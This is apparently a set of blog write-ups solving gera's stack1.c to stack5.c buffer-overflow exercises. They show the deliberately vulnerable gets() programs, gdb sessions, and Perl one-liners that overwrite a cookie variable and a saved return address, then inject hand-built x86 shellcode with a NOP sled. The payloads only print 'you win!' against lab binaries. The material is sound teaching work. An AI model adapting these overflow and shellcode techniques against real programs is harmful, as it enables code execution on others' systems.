Insecure Programming by Example: shellcode & stack5.c


Now it’s time for Insecure Programming by Example exercise stack5.c, and in the interest of brevity I’ll just go ahead and post the damned thing.

/* stack5-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
        int cookie;
        char buf[80];

        printf("buf: %08x cookie: %08x\n", &buf, &cookie);

        if (cookie == 0x000d0a00)
                printf("you loose!\n");

So, what’s new in this version…oh wait, if we set the cookie correctly, it prints out “you loose!”…so what the heck are we supposed to do now?

The answer lies with shellcode. Basically, we are given a buffer to work with, and we need to put instructions directly in the buffer in the form of raw bytes, and jump execution to a point where our shellcode will run. That’s pretty much it. The concept should be pretty familiar at this point, and as you’ll see the execution is not so hard.

Epic Sploits

It’s worth mentioning that these programs are purposely designed to be exploited. And the techniques we are using are among the most basic when it comes to this sort of thing. Though I have no experience in this line of work professionally, it cannot all be this straight forward. If you want an example of something truly advanced, explained so even I can grasp the basics, I’d go check out Thomas Ptacek’s write up of Mark Dowd’s Flash NULL pointer exploit. It gives us a glimpse into what the truly advanced techniques look like, and Thomas does an excellent job of explaining not only how it works (generally) but why it’s such a big deal.

So if I act like I know what I’m talking about, just understand that this is a very useful foundation that we are building together, and if you have enjoyed yourself so far, you will not be bored, because there will be plenty of work to do.


There are many ways we can attack the problem of developing the shellcode and making it available to the process to be executed. Thanks to the Internet, there are very many resources where sample shellcode for all sorts of different systems can be referenced or even automatically generated. But in this brief article I’ll take you through the manual generation of shellcode and then the process of getting it to run on the vulnerable program step-by-step. Hacking: The Art of Exploitation‘s chapter on shellcode was heavily used as a reference for my original solution (which I can no longer remember), and I’m sure I’ll go back there for more looks in the course of writing this post.

Abstractions of Abstractions

NOTE: This is an area I’m still learning a lot about, if I gloss something over to the point that it’s incorrect or inaccurate, please let me know and I’ll fix it.

So, let’s talk real quick about the difference between instructions, system calls, and C library functions or calls.  Essentially, at the lowest level you have x86 assembly instructions, like push, pop, call, mov, and return. These instructions are hard coded into the logic of the processor, and though the implementation of them in actual transistor logic may change, you generally won’t see the interface to the instruction change at all (for instance, the number or type of arguments it takes). The list of instructions (and of course the registers) that a processor supports is essentially what makes a processor x86-compatible.

NOTE: in the course of doing research for this article, it seems like the system calls and the C library functions are typically both implemented via libc, or in the libc project/package/whatever. The distinction between the two I’m observing here is valid, because they are used two completely different ways, and are even parts of a different set of standards each. I’d think of them as two sides of the same coin, but I’m sure that analogy breaks down as all do at some point.

The next layer up is kernel system calls. System calls are convenient pointers to groups of assembly instructions (implemented as a system library typically in /lib) that “do stuff” with the given arguments, but they are not inherent to the x86 processor, rather they are inherent to the kerneland operating system that you are using at the time. They invariably are implemented in assembly (I suppose everything is, eventually), and their purpose (along with the entire kernel, really) is to provide a standardized interface to the hardware of the system. Any time you print something to the screen, type something, use your microphone to record something, or listen to music through your headphones, you are using the standard resources provided by the kernel and the kernel’s system calls to do so. For the curious, we have not yet used system calls at all (except through further-up abstractions such as printf(), which we’ll talk about next) but we will make extensive use of them when we write our shellcode.

The final and highest layer of abstraction we’ll deal with is the C standard library functions, implemented through the various header files located typically in /usr/include on your average Linux distribution. The C standard library is defined through an ISO standard, and each operating system that wants to use C capabilities past what the compiler provides (as an interface to assembly instructions for allocating and managing memory) in a way consistent with other operating systems or kernels needs to implement the standard functions the library defines. Every time you use #include <stdio.h> to call printf(), or #include <string.h> to call strcpy(), you are using functions defined by the ISO standard for C, and implemented in libc, accessible to all processes at a predictable location in memory.

Oh boy, this section sure does gloss over quite a bit that might be worth mentioning. I’m sure it will come up at some point later on, in the meantime if you want to do some extracurricular reading, I would say a great reference, perhaps the only one you’ll ever need, is Advanced Programming in the UNIX Environment by W. Richard Stevens and Stephen Rago, it’s a bit above my head but it will serve you well if you ever need to look something up…ever.  If you want a more gentle introduction that is very outdated but still quite informative and fun to read, I’d recommend The UNIX Programming Environment by Brian Kernighan and Rob Pike, I read this book and really liked it.

Enough Edumacation, Let’s Break Shit

Now I’m going to briefly outline how to build the shellcode we’re going to use, and then again briefly talk about some quick optimizations you can do to get rid of null bytes and wasted space in the shellcode. This is not super important for the gets() function, but if you are using something like strcpy() in the future or something else null terminated to get your shellcode into memory it will prematurely terminate the function.

We are going to use the write() system call for Linux to actually print out our string. I guess that there are others that are available to print output to a file descriptor (STDOUT in our case), and I was hoping to find where printf() or puts() from the C standard library directly referenced the write() system call to satisfy personal curiosity, but couldn’t.

Assembly code can be written using mnemonics, which are basically English-like direct correlations to a one-byte number that is the actual machine language that the processor understands. Whenever we use push or something like it with an argument after it, or whenever we see it in the output of objdump -D or another disassembler, we need to remember that it’s just another abstraction. The job of turning mnemonic instructions into actual machine language is that of the assembler. The assembler we’re going to use is a fairly standard and free version called the Netwide Assembler.

section .data  ; data segment
msg   db "you win!", 0x0a, 0x0d ; the string to print with newline at the end

section .text  ; text segment, where the code is
global _start  ; default entry point for ELF linking

; SYSCALL: ssize_t write(int fd, const void *buf, size_t count);
; Our syscall: write(1, msg, 10)
mov eax, 4  ; put 4 into EAX register, syscall write is #4 (/usr/include/asm-i386/unistd.h)
mov ebx, 1  ; put 1 into EBX, since file descriptor we want is STDOUT
mov ecx, msg   ; Put the address of the string pointer into ECX, since it's what we want to print
mov edx, 10 ; put 10 into EDX, since string is 10 bytes (with crlf at the end)
int 0x80 ; tell the kernel to do a syscall

; SYSCALL: void _exit(int status);
; Our syscall: exit(0) meaning that there were no problems
mov eax, 1  ; put 1 into EAX since exit() is syscall #1
mov ebx, 0  ; put 0 into EBX, since that's our one and only argument to exit()
int 0x80 ; tell the kernel to do a syscall

The above code is an example of how one might write a program in assembly to print out “you win!”. The code is commented, and the comments explain each step. If we wanted to assemble this code into a proper ELF binary for Linux, we’d have to assemble the code into an object file with nasm, and then link the executable by running the ld command.

hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.asm
printyouwin.asm: ASCII English text
hacking@hacking-theart:~/InsecureProgramming $ nasm -f elf printyouwin.asm
hacking@hacking-theart:~/InsecureProgramming $ ls -la printyouwin.*
-rwxr--r-- 1 hacking hacking 651 2009-12-12 11:08 printyouwin.asm
-rw-r--r-- 1 hacking hacking 544 2009-12-12 11:09 printyouwin.o
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin.o
printyouwin.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ld -o printyouwin printyouwin.o
ld: warning: cannot find entry symbol _start; defaulting to 0000000008048060
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin
printyouwin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
hacking@hacking-theart:~/InsecureProgramming $ ./printyouwin
you win!

This is all well and good, however since we are using our shellcode within another already-started process, we won’t have the ability to reference the memory in the various sections of the executable to retrieve static values such as the string “you win!” which will be passed as an argument to the write() call. Since we know the other integer values for the 2 remaining arguments to write(), and can provide them directly, that is not such an issue because we can populate those registers with a mov instruction. But we need a way to get the string value we want to print into the ECX register, so write() will print it out for us. Enter the stack.

BITS 32             ;  Tell nasm this is 32-bit code.

  call mark_below   ;  Call below the string to instructions
  db "you win!",  0x0a, 0x0d  ; with newline and carriage return bytes.

; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  mov eax, 4        ; Write  syscall #.
  mov ebx, 1        ; STDOUT  file descriptor
  mov edx, 10       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 10)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall:  exit(0)

What this code does is uses a trick of the call instruction within assembly to place the next address following the call onto the stack, which immediately after the call is popped back off of the stack into the ECX register. That address is used as a pointer to the string that we want to print.

This code we’ll want to translate not the ELF format, but to raw machine instructions, since we want to inject this code into a running process. To do this, we’ll use nasm without any arguments concerning the format parameter, then I’ll show you how many bytes the assembled shellcode takes up, and what it looks like when disassembled. Remember that, since we only have control of the 80 byte buffer we only really have that many bytes to work with, give or take a few, so our shellcode cannot be too bloated.

hacking@hacking-theart:~/InsecureProgramming $ nasm -o printyouwin1 printyouwin1.asm
hacking@hacking-theart:~/InsecureProgramming $ file printyouwin1*
printyouwin1:     data
printyouwin1.asm: ASCII English text
printyouwin1.o:   ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped
hacking@hacking-theart:~/InsecureProgramming $ ls -l printyouwin1
-rw-r--r-- 1 hacking hacking 45 2009-12-12 11:57 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ wc -c printyouwin1
45 printyouwin1
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C printyouwin1
00000000  e8 0a 00 00 00 79 6f 75  20 77 69 6e 21 0a 0d 59  | win!..Y|
00000010  b8 04 00 00 00 bb 01 00  00 00 ba 0a 00 00 00 cd  |................|
00000020  80 b8 01 00 00 00 bb 00  00 00 00 cd 80           |.............|
hacking@hacking-theart:~/InsecureProgramming $ objdump -D printyouwin1
objdump: printyouwin1: File format not recognized
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 printyouwin1
00000000  E80A000000        call 0xf
00000005  796F              jns 0x76
00000007  7520              jnz 0x29
00000009  7769              ja 0x74
0000000B  6E                outsb
0000000C  210A              and [edx],ecx
0000000E  0D59B80400        or eax,0x4b859
00000013  0000              add [eax],al
00000015  BB01000000        mov ebx,0x1
0000001A  BA0A000000        mov edx,0xa
0000001F  CD80              int 0x80
00000021  B801000000        mov eax,0x1
00000026  BB00000000        mov ebx,0x0
0000002B  CD80              int 0x80

This shellcode, while awesome, is not foolproof for many scenarios. If we are using the gets() function, we cannot include newlines in our printed string, because they will prematurely terminate the gets() function. If we are using other typical string-based functions such as strcpy(), the null bytes will kill us by prematurely terminating those functions as well. Here is a slimmed down version of the shellcode, that uses various techniques such as high-and-low bytes of 16-bit registers, XORing registers against themselves to zero out 32-bit registers prior to instruction execution, smaller instructions such as jmp short to eliminate further null bytes, and calling back up into memory using a two’s compliment memory address to avoid more null bytes. It also eliminates the 0x0a and 0x0d newline or carriage return bytes as they would kill the gets() function prematurely.

BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 14)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; with no newline or carriage return bytes.

And here is us, assembling the code and then putting it into the buffer, prefixed with a NOP sled to be executed successfully! You win!

hacking@hacking-theart:~/InsecureProgramming $ nasm -o stack5shellcode.out stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ md5sum stack5shellcode*
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode
0f2668754e312f90cef8dff7f6c90723  stack5shellcode.bytes
4c8c79ca6379f417c750f1712fbb5652  stack5shellcode.out
bd6be6a87c2eee6e0fab27f13ba5853d  stack5shellcode.s
hacking@hacking-theart:~/InsecureProgramming $ ndisasm -b32 stack5shellcode.out
00000000  EB13              jmp short 0x15
00000002  59                pop ecx
00000003  31C0              xor eax,eax
00000005  B004              mov al,0x4
00000007  31DB              xor ebx,ebx
00000009  43                inc ebx
0000000A  31D2              xor edx,edx
0000000C  B208              mov dl,0x8
0000000E  CD80              int 0x80
00000010  B001              mov al,0x1
00000012  4B                dec ebx
00000013  CD80              int 0x80
00000015  E8E8FFFFFF        call 0x2
0000001A  796F              jns 0x8b
0000001C  7520              jnz 0x3e
0000001E  7769              ja 0x89
00000020  6E                outsb
00000021  21                db 0x21
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C stack5shellcode.out
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  | wi|
00000020  6e 21                                             |n!|
hacking@hacking-theart:~/InsecureProgramming $ perl -e 'print "\x90" x 74 . "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "\xb0\xf7\xff\xbf\n";' | ./stack5
buf: bffff7b0 cookie: bffff80c
you win!hacking@hacking-theart:~/InsecureProgramming $ 

I wanted to make sure that a NOP sled was an understood concept, but really we could have just as easily put the shellcode at the very beginning of the buffer, padded the rest with junk, and executed all the same.

root@hacking-theart:/home/hacking/InsecureProgramming # perl -e 'print "\xeb\x13\x59\x31\xc0\xb0\x04\x31\xdb\x43\x31\xd2\xb2\x08\xcd\x80\xb0\x01\x4b\xcd\x80\xe8\xe8\xff\xff\xff\x79\x6f\x75\x20\x77\x69\x6e\x21" . "A" x 74 . "\x80\xf7\xff\xbf\n";' | ./stack5
buf: bffff780 cookie: bffff7dc
you win!root@hacking-theart:/home/hacking/InsecureProgramming #

And that (finally) wraps us up for the stackN.c series of stack buffer overflows designed and provided for free by gera of Core. I’ll probably never, ever write about these again, it was pretty laborious, but I hope you didn’t find reading about it so. I used very many references through completing these write-ups, and I recommend them all, but if you can’t afford to go out and buy $500.00 worth of new books, you might want to check out the Safari Books Online site that O’Reilly offers, as it’s a pretty good deal (though less so now that they eliminated the 5-book shelf :-(). The Internet and Google (and Bing!) are your friends as well. Go forth, and break things!


Insecure Programming by Example: controlling EIP, stack4.c

Note: I couldn’t get this exploit to work on Debian 5, I think there must be some overflow protection or something I was working against on top of the ASLR I had already disabled. So I moved to the Hacking; the Art of Exploitation LiveCD, but any much older Linux should work for you (think Red Hat 7).

Ok, so everyone, before reading this one, repeat after me:

The goal is to control execution. The goal is to win. It doesn’t matter how you control things, or how you win, just win. Control is everything.

That may sound a little melodramatic, but I remember having a really hard time with stack4.c, not because the concepts were hard to grasp, but because I kept trying to control execution of the program the way I had in the previous three challenges, instead of just winning any way I could. That to me is the fundamental thing this challenge is attempting to teach the student. This particular challenge is not really about controlling EIP (though you will learn how to do that), rather, it’s about changing the way you think about computer programs in general. The point being that they do not always do what we think we told them to do, they do exactly what we told them to do ;-).

If you want to read a quick’n’dirty description of the right mindset for this sort of thing, along with some ideas on how to proceed if you want to be good at being bad, I highly recommend @kmx2600‘s article on the VRT blog, “How do I become a ninja?”. Indeed, those are the steps that I’m now following to better myself in this arena, and I’m the one that asked his team the question in the first place, so it’s only appropriate I should share my progress so others might get bitten by the bug as well.

On to the bug!

/* stack4-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);

	if (cookie == 0x000d0a00)
		printf("you win!\n");

So…this may be tricky. Can anyone see why? See, they want us to make the cookie value equal to 0x000d0a00…can anyone spot the problem with this, alluded to in a previous post? That’s right, we can’t set the cookie variable to the appropriate value via the gets() function, because gets() terminates on a newline character, otherwise known as 0x0A. So we are going to need to find a way to win without setting the value of the cookie variable directly.

How else could we win? Think back to the beginning of this post, the object of the game is to take control of execution Any way we’d like to. We want the program to print out “you win!”. If we look at this program in a debugger, from the assembly language perspective, a way to do this might become clear.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x78
0x080483ba <main+6>:    and    esp,0xfffffff0
0x080483bd <main+9>:    mov    eax,0x0
0x080483c2 <main+14>:   sub    esp,eax
0x080483c4 <main+16>:   lea    eax,[ebp-12]
0x080483c7 <main+19>:   mov    DWORD PTR [esp+8],eax
0x080483cb <main+23>:   lea    eax,[ebp-104]
0x080483ce <main+26>:   mov    DWORD PTR [esp+4],eax
0x080483d2 <main+30>:   mov    DWORD PTR [esp],0x80484d4
0x080483d9 <main+37>:   call   0x80482d4 <printf@plt>
0x080483de <main+42>:   lea    eax,[ebp-104]
0x080483e1 <main+45>:   mov    DWORD PTR [esp],eax
0x080483e4 <main+48>:   call   0x80482b4 <gets@plt>
0x080483e9 <main+53>:   cmp    DWORD PTR [ebp-12],0xd0a00
0x080483f0 <main+60>:   jne    0x80483fe <main+74>
0x080483f2 <main+62>:   mov    DWORD PTR [esp],0x80484ec
0x080483f9 <main+69>:   call   0x80482d4 <printf@plt>
0x080483fe <main+74>:   leave
0x080483ff <main+75>:   ret
End of assembler dump.

This is where some very basic knowledge of x86 assembly language will pay off (and I mean very basic, as I am certainly no expert). The highlighted section above is essentially equal to the C functions:


if (cookie == 0x000d0a00)
	printf("you win!\n");

I’ll leave it to the reader to read some intros on x86 assembly programming, or better yet, to read the excellent “Programming from the Ground Up” by Jonathan Bartlett, but it should be plain from the listing above what is occurring. Here is a summary with the details glossed over a bit.

First, we call the gets() function to get our input with call 0x804830c, then we move an 8-byte (DWORD) pointer located 8 bytes into the stack (ebp-0x8) into the eax register, and then we compare that value (stored at the de-referenced pointer, read a book on C if you don’t get the pointer stuff, it’s important) with the hex value 0xd0a00. Keeping the result of that comparison in mind (using the EFLAGS register, another important thing to understand), we then implement the if statement using the jne function, which stands for “jump if not equal”. If the comparison earlier was not equal, it jumps execution past the puts() function call (similar to printf) at 0x080483f2 which would print out our “you win!” statement. That’s how the if/then construct in C ends up looking in assembly.

The important thing to take away here, is that if we want to print out “you win!”, we simply need to get the instructions at 0x080483f2 to be executed. The easiest way to do that is to get EIP to point there. The easiest way to do that is to overflow the value for EIP that is stored during the execution of the main() call. Essentially, anytime any function is called such as gets(), printf(), or even main() which is what we are counting on here, the return address, which is the address to move execution to following the successful processing of the function call is populated onto the stack, along with any other variables local to the parent function or any other function that we’re calling. That means that if the program flow allows us to get to the point where it’s exiting execution of the function, and we can write to the stack an arbitrary amount of data with a bad function such as gets(), we can pretty much do whatever we want!

The game plan is to figure out where the return address is stored for/during the execution of the main() call, determine it’s distance from the buf variable, and figure out if we can overwrite it with the value 0x080483f2…if we can do this, we win. Let’s explore the state of the program at the time gets() is called using our debugger, specifically we want to see the state of the stack, the best way to do this is to examine stack frames with the backtrace command. I’ve highlighted the commands we’re going to use below, as a few of them are new ones you’ll want to have in your back pocket in the future.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q ./stack4
Using host libthread_db library "/lib/tls/i686/cmov/".
(gdb) set disassembly-flavor intel
(gdb) break gets
Function "gets" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (gets) pending.
(gdb) run
Starting program: /home/hacking/InsecureProgramming/stack4
Breakpoint 2 at 0xb7ef21c6
Pending breakpoint "gets" resolved
buf: bffff770 cookie: bffff7cc

Breakpoint 2, 0xb7ef21c6 in gets () from /lib/tls/i686/cmov/
(gdb) backtrace
#0  0xb7ef21c6 in gets () from /lib/tls/i686/cmov/
#1  0x080483e9 in main () at stack4.c:11
(gdb) info frame 0
Stack frame at 0xbffff760:
 eip = 0xb7ef21c6 in gets; saved eip 0x80483e9
 called by frame at 0xbffff7e0
 Arglist at 0xbffff758, args:
 Locals at 0xbffff758, Previous frame's sp is 0xbffff760
 Saved registers:
  ebp at 0xbffff758, eip at 0xbffff75c
(gdb) info frame 1
Stack frame at 0xbffff7e0:
 eip = 0x80483e9 in main (stack4.c:11); saved eip 0xb7eafebc
 caller of frame at 0xbffff760
 source language c.
 Arglist at 0xbffff7d8, args:
 Locals at 0xbffff7d8, Previous frame's sp is 0xbffff7e0
 Saved registers:
  ebp at 0xbffff7d8, eip at 0xbffff7dc
(gdb) print 0xbffff7dc - 0xbffff770
$1 = 108
(gdb) next
Single stepping until exit from function gets,
which has no line number information.
main () at stack4.c:13
13              if (cookie == 0x000d0a00)
(gdb) x 0xbffff7dc
0xbffff7dc:     0x42424242

What we’re seeing here is that the stored EIP for the main() stack frame is 108 bytes from the buf variable’s start position. In essence, each memory address refers to a single byte of storage, so by calculating the difference between two addresses we know exactly how many bytes we must send to overflow the stored EIP in the stack. Since a single ASCII-encoded character is exactly one byte long, I went ahead and sent 108 “A” characters with 4 “B” characters tacked onto the end to overflow the stored EIP, and examining that memory address directly it worked.

So, let’s try our exploit know, knowing that 108 bytes is our offset for the variables. The code will fully execute, it will just jump back up the execution path on attempting to exit the first time and print out the “you win!” message, and then it will exit gracefully as if nothing had happened. Or at least, that’s the idea.

hacking@hacking-theart:~ $ perl -e 'print "A" x 108 . "\xf2\x83\x04\x08\n";' | ~/InsecureProgramming/stack4
buf: bffff790 cookie: bffff7ec
you win!
Segmentation fault

Ok, so, that worked! We still need to figure out why it segfaulted, and also why I couldn’t do this on the Debian 5 machine, but I’ll leave those subjects for future articles. Thanks for reading, hope you learned something.

Insecure Programming by Example: ruminations on stack3.c

So, last things first on this one, lets get the solution out of the way, and then we can talk about why exactly this challenge was so easy, and how it could be written to teach something. I’m not sure, but I think this one may have been an oversight on gera’s part…either way, let’s talk it through and hopefully teach something along the way.

Here is Insecure Programming by Example stack3.c:

/* stack3-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);

	if (cookie == 0x01020005)
  		printf("you win!\n");

And here is the solution:

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack3 stack3.c
/tmp/cci2jW0e.o: In function `main':
/home/mishley/InsecureProgramming/stack3.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x00\x02\x01" . "\n";' | ./stack3
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

Now, on to why this one was so easy and conceptually no different from the prior challenge. I believe gera was trying to teach us to be aware of null-byte termination of strings within memory. Basically, a lot of string functions from the ANSI C standard do whatever it is they are supposed to do until they hit a null-byte (null being 0x00), and most strings in memory are terminated using null-bytes because of this. The most infamous example of a function that uses null-bytes is strcpy() from string.h. The thing is, gets() does not terminate on a null-byte, instead it terminates on a newline (0x0A) or EOF (0x04) character. It will be important to know how the heck functions terminate input in upcoming examples in the stackN.c series and also in the further-along aboN.c series (which I have not yet completed). I thought it was important to explore why this one was so easy though, and to give the reader some food for thought as to how this might affect them in the future.

There will be more exploration of values that terminate our gets() function prematurely in upcoming articles, in the meantime, thanks for reading :-).

Insecure Programming by Example: gdb debugging & stack2.c

This post will be less detailed than the previous one, mainly because most of the concepts are identical.

Here is Insecure Programming by Example stack2.c:

/* stack2-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);

	if (cookie == 0x01020305)
  		printf("you win!\n");

As you can see, the only real change is the value of the cookie variable. Seems simple enough, right? We can just send the program “5321” and be done with it! Of course, there is a reason gera wrote this almost-identical challenge, which will become apparent shortly. Let’s compile it and try to feed it the “5321” string, and see what happens.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack2 stack2.c
/tmp/cc5NHEBj.o: In function `main':
/home/mishley/InsecureProgramming/stack2.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack2
buf: bffffa00 cookie: bffffa50
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321";' | ./stack2
buf: bffffa00 cookie: bffffa50
Segmentation fault

Ok, this is odd. We successfully overflowed the buffers, because we segfaulted due to overflowing the return address (or something else important) in the stack frame for gets(). But, it appears we didn’t get the “you win!” message we expected…like I said, things are not always this easy, and there is a good reason gera wrote this challenge. Now is the time to attach a debugger and take a look at why we are having some issues with this challenge. We will use GDB as our debugger-of-choice, it is adequate to this task, though for more complicated exploitation on other platforms (re: Windows) a GUI-based debugger like OllyDbg or Immunity Debugger might be preferred.

Using a debugger allows us to manually step through the execution of the code at the CPU or assembly language level and examine the state of the code at breakpoints we set during the execution. Think of a breakpoint as a pause button in your favorite video game, while the game is paused you can examine your inventory and statistics, change equipment, etc. The analogy is clear, while execution is paused with a debugger you can do tasks like that as well, such as examining the state of registers, stack traces and frames, and contents and state of RAM itself.

It would probably be good at this point for the reader to familiarize themselves with the basic premises of how a computer works (we’re talking Von Neumann machines, here, of the x86 variety ;-)). I couldn’t find a really good explanation on short notice, but there are a couple of good books on the subject. Various parts of “Hacking: The Art of Exploitation” by Jon Erickson and “The Gray Hat Hacker’s Handbook” by Various Artists cover this in multiple locations. The best intro I own, which is probably more in-depth than anyone but a CE/EE cares to know, is “Inside the Machine” by Jon Stokes. If you are looking for something you can read online for free, there is a GREAT book by Jonathan Bartlett called “Programming from the Ground Up” that covers all of the needed basics, including teaching the reader how to write real programs in pure assembly. Best of all, it can be read online or downloaded for free, and is available from online booksellers for a reasonable price. I personally bought the book because he did a great job, after using the online edition a lot.

With that said, let’s start use our debugger to examine the state of the system at the time of the segfault and see why the heck we didn’t get our “you win!” love from the program.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321\n";'
debian5:/home/mishley/InsecureProgramming# gdb -q ./stack2
(gdb) list
1	/* stack2-stdin.c                               *
2	 * specially crafted to feed your brain by gera */
4	#include <stdio.h>
6	int main() {
7		int cookie;
8		char buf[80];
10		printf("buf: %08x cookie: %08x\n", &buf, &cookie);
(gdb) list
11		gets(buf);
13		if (cookie == 0x01020305)
14	  		printf("you win!\n");
15	}
(gdb) break 13
Breakpoint 1 at 0x804843a: file stack2.c, line 13.
(gdb) run
Starting program: /home/mishley/InsecureProgramming/stack2
buf: bffff9d0 cookie: bffffa20

Breakpoint 1, main () at stack2.c:13
13		if (cookie == 0x01020305)
(gdb) x/x &cookie
0xbffffa20:	0x31323335
(gdb) quit
The program is running.  Exit anyway? (y or n) y

What we see in the highlighted line is that the value of the cookie variable is set to 0x35333231 (remember your endian-ness). Which is curious, since we specified “5321” in our print statement…what could be happening here? The answer is, we are not passing the actual value “5321” in the form of integers via the print statement, instead we are passing the ASCII equivalent values for “5321”, which sure enough maps out to 0x35, 0x33, 0x32, and 0x31. So what we need here is an easy way to pass hexadecimal integers via Perl’s print statement. The easiest way to do this is to escape the characters, so we would be printing raw bytes that we specify. Here is an example with the problem we have faced in this article solved.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x03\x02\x01\n";' | ./stack2
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

By using the Perl escaped characters \xNN we can print raw bytes to the STDIN of the stack2 program, successfully overflowing the cookie variable using a stack buffer overflow, and winning the game! I hope folks are finding these articles informative, I know I am learning a lot having to write it all out.

Insecure Programming by Example: Intro & stack1.c

I’m going to start documenting gera from Core’s Insecure Programming by Example series of wargames.  I have already completed the stackN.c series, and want to go through my solutions to document what I did and tickle my memory a bit, as I did this about 4 months ago.

Here is stack1.c:

/* stack1.c                                     *
 * specially crafted to feed your brain by gera */


int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &amp;buf, &amp;cookie);

	if (cookie == 0x41424344)
		printf("you win!\n");

In the highlighted line, you can see they are using the gets() function to store supplied data (via STDIN) to the “buf” character array. This, as we will see, is a bad idea, because there is no length checking of the data provided via gets() to ensure it will not overflow the 80 bytes allocated for the buf array, hence an overflow condition exists.

All of the stackN.c series essentially follow this same framework, the idea being to get the program to print “you win!” when run by providing input via the vulnerable gets() function. You also should not change the code

Let’s compile the program and give it a run, so we can see where the variables are stored in memory. For the purposes of these exercises I’ll be using Linux and the GNU Compiler Collection (with gdb as my debugger), and I’ll be turning off process memory randomization by setting /proc/sys/kernel/randomize_va_space to 0.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack1 stack1.c
/tmp/ccCsgKNz.o: In function `main':
/home/mishley/InsecureProgramming/stack1.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack1
buf: bffffa00 cookie: bffffa50

Notice that GCC itself warns us that the program is using the gets() function and it is generally a bad idea. We can see from the output of the command that the “buf” variable is located exactly 80 bytes from the “cookie” variable. Based on this byte count, and an understanding of how process memory is allocated, and the use of the insecure gets() function, we should be able to overflow the value of the cookie variable to match the required value and print “you win!”. If you want to understand a bit more about how stack buffer overflows work, a good starting point is the Wikipedia article, and if you are a bit more advanced of a user the paper “Smashing the Stack for Fun and Profit” published in Phrack#49 by Aleph One.

Enough of that, let’s talk about building the “exploit”…that’s a pretty grand name for something which we’re just going to use some simple Perl for ;-). Anyways, we identified that the two buffers (the one we can write to and the one we can’t) are separated by 80 bytes of space, so essentially we will write 80 garbage bytes plus whatever the heck we want the cookie var to end up being, and the write operations from gets() will overwrite whatever is there.

In order to win, we’ll need to get the cookie variable to equal 0x41424344 (which is hexadecimal for the uninitiated). Fortunately, this is pretty easy to do, since those are ASCII character codes, and I can use the Perl print statement to print the characters equivalent to those values to the input pipe of the stack1 program. Finally I should mention that due to the little-endian nature of memory in x86-compatible processors (which I am assuming you are using, as are most of us), I have to reverse the byte/character order when sending it to the gets() function…you’ll see.


debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "DCBA";' | ./stack1
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

